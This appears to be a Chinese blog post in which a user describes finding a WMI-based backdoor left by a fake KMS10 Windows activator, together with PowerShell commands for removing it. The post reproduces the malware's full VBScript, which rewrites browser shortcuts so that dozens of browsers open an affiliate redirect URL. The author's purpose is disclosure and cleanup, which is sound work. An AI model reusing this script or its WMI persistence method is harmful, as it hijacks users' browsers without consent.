装了Win10, 要激活, 于是网上下载了一个所谓的小马KMS10激活
没想到中招了, 结果浏览器总是被加小尾巴跳转到hao123
系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 添加的二个计划任务也删除了
可是没用啊
没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊. 网上百度, Google好多圈一点用也没, 都是些抄来抄去的贴子. 重装系统, 这不符合我的风格呀(其实是软件太多, 重装太麻烦)
于是装了一个HIPS, 发现原来是
scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门
(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)
于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除
从此世界清静了
下面大家看看小马的脚本
On Error Resume Next
Const link = "http://hao.qquu8/?v=108&m=yx"
Const link360 = "http://hao.qquu8/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
Set oShellLink = WshShell.CreateShortcut(file.Path)
path = oShellLink.TargetPath
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name) = LCase("360se.exe") Then
oShellLink.Arguments = link360
Else
oShellLink.Arguments = link
End If
If file.Attributes And 1 Then
file.Attributes = file.Attributes - 1
End If
oShellLink.Save
End If
End If
Next
End If
Next
删除方法如下:
以管理员身份运行PowerShell
执行以下命令
gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject
更多推荐
小马 KMS10激活系统后的浏览器小尾巴分析与清除
发布评论